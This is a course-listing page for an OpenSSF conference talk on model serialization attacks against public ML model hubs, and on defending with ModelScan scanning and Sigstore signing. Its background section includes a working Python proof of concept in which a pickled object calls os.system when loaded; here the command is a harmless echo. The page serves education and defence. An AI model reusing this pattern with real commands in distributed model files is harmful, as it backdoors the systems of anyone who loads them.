

Trojan Model Hubs: Hacking the ML Supply Chain and Defending Against Model Serialization Attacks

OpenSSF via YouTube

Overview

Watch a 27-minute conference talk exploring security risks and defensive strategies in machine learning supply chains. Learn about the growing reliance on public model hubs for foundation models and the vulnerability of ML model files to Model Serialization Attacks (MSAs). Discover how these attacks can turn seemingly innocent models into system backdoors by injecting malicious code that executes during deserialization. Explore two key defensive strategies using open-source tools: model scanning with ModelScan by Protect AI and cryptographic signing with Sigstore by OpenSSF. Understand how model scanning provides visibility into black-box model files, while cryptographic signatures establish trusted links between artifacts and their sources. See demonstrations of how these traditional software security approaches can be adapted to protect AI/ML systems from supply chain attacks and prevent Trojan-horse infiltrations.
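
As background for the attack class the talk covers: Python's pickle format can embed callables that run at load time, which is what makes model serialization attacks possible. The sketch below is illustrative only and not taken from the presentation; the MaliciousModel class and the echoed command are hypothetical stand-ins showing how a booby-trapped "model" file executes a command the moment it is deserialized.

    import os
    import pickle

    class MaliciousModel:
        """Stand-in for a 'model' whose pickle payload runs code on load."""

        def __reduce__(self):
            # pickle calls __reduce__ during serialization; on load, the
            # returned callable is invoked with these arguments, so the
            # command below runs as soon as the file is unpickled.
            return (os.system, ("echo 'payload executed during model load'",))

    # An attacker ships the booby-trapped object as an ordinary model file.
    with open("model.pkl", "wb") as f:
        pickle.dump(MaliciousModel(), f)

    # A victim loads what looks like a legitimate model; the payload fires here.
    with open("model.pkl", "rb") as f:
        pickle.load(f)

Scanners such as ModelScan flag serialized model files containing this kind of executable payload, while a Sigstore signature lets a consumer verify that a model artifact actually came from the publisher it claims to, rather than from a tampered copy on a public hub.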

Syllabus

Trojan Model Hubs: Hacking the ML Supply Chain & Defending Yourself... Sam Washko & William Armiros

Taught by

OpenSSF
